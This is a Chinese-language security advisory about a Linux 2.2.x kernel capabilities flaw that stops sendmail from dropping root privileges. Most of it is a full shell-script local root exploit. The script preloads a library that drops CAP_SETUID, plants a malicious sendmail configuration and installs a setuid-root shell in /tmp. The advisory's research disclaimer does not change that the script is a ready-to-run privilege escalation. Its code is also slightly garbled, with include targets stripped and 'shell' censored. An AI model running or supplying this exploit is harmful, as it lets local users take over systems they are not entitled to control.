描述
linux 内核漏洞使本地攻击者能通过 sendmail 获得管理员权限 详细
受影响系统
Linux 2.3 (development)
Linux 2.4.0-test1
Linux 2.1.15 and prior
不受影响系统
Linux 2.1.16 and above
利用 "Capabilities" 对授权进程进行控制时,通过指定某些 "Capabilities" ,程序获得的访问权限只能到达程序所要求到达的级别,这本来是一个有效的安全措施。问题是 "Capabilities" 在 fork() 子进程时可复制,这意味着如果 "Capabilities" 在父进程中被设置,就会被传递给子进程。如果在父进程中将 CAP_SETUID 的能力禁止,那么子进程将不能执行 setuid() 调用。这就可能带来一个安全问题,如果在子进程中执行 sendmail ,在 sendmail 想用 setuid(getuid()) 丢弃掉root权限时,它就不能真正的完成这个操作,因此sendmail 就还会以 root 权限运行,攻击者可能利用 .forward 来获取 root 权限。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
#!/bin/sh
echo "+-----------------------------------------------------------+"
echo "| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |"
echo "| local root exploit |"
echo "| |"
echo "| Bugs found and exploit written by Wojciech Purczynski |"
echo "| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |"
echo "+-----------------------------------------------------------+"
TMPDIR=/tmp/foo
SUIDSh*ll =/tmp/sush
Sh*ll =/bin/tcsh
umask 022
echo "Creating temporary directory"
mkdir -p $TMPDIR
cd $TMPDIR
echo "Creating anti-noexec library (capdrop.c)"
cat <<_FOE_ > capdrop.c
#define __KERNEL__
#include
#undef __KERNEL__
#include
_syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data)
extern int capset(cap_user_header_t header, cap_user_data_t data);
void unsetenv(const char*);
void _init(void) {
struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0};
struct __user_cap_data_struct capd={0, 0, 0xfffffe7f};
unsetenv("LD_PRELOAD");
capset(&caph, &capd);
system("echo|/usr/sbin/sendmail -C$TMPDIR/sm.cf $USER");
}
_FOE_
echo "Compiling anti-noexec library (capdrop.so)"
cc capdrop.c -c -o capdrop.o
ld -shared capdrop.o -o capdrop.so
echo "Creating suid sh*ll (sush.c)"
cat <<_FOE_ > sush.c
#include
int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); }
_FOE_
echo "Compiling suid sh*ll (sush.c)"
cc sush.c -o $TMPDIR/sush
echo "Creating sh*ll script"
cat <<_FOE_ >script
mv $TMPDIR/sush $SUIDSh*ll
chown root.root $SUIDSh*ll
chmod 4111 $SUIDSh*ll
exit 0
_FOE_
echo "Creating own sm.cf"
cat <<_FOE_ >$TMPDIR/sm.cf
O QueueDirectory=$TMPDIR
O ForwardPath=/no_forward_file
S0
R\$* \$#local \$: \$1
Mlocal, P=$Sh*ll , F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
T=DNS/RFC822/X-Unix, A=$Sh*ll $TMPDIR/script
_FOE_
echo "Dropping CAP_SETUID and calling sendmail"
export LD_PRELOAD=$TMPDIR/capdrop.so
/bin/true
unset LD_PRELOAD
echo "Waiting for suid sh*ll ($SUIDSh*ll )"
while [ ! -f $SUIDSh*ll ]; do sleep 1; done
echo "Removing everything"
cd ..
rm -fr $TMPDIR
echo "Suid sh*ll at $SUIDSh*ll "
$SUIDSh*ll
------------------
曾经......
现在!!!!!!
将来??????